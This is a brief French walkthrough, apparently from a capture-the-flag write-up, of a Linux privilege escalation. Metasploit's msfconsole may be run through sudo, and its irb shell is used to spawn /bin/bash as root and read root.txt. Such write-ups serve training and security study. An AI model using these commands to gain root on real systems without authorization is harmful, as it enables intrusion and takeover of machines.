Sudo (Metasploit) - Linux Privilege Escalation

On vérifie les permissions sudo :

sudo -l

On découvre que nous pouvons exécuter Metasploit en tant que root :

sudo /opt/metasploit-framework-6.0.9/msfconsole

Dans msfconsole, nous ouvrons une shell Ruby interactive :

irb

Puis nous exécutons un shell Bash :

system("/bin/bash")

Nous sommes maintenant root et pouvons lire le flag root.txt ! 🎉

Mis à jour il y a 9 mois

Ce contenu vous a-t-il été utile ?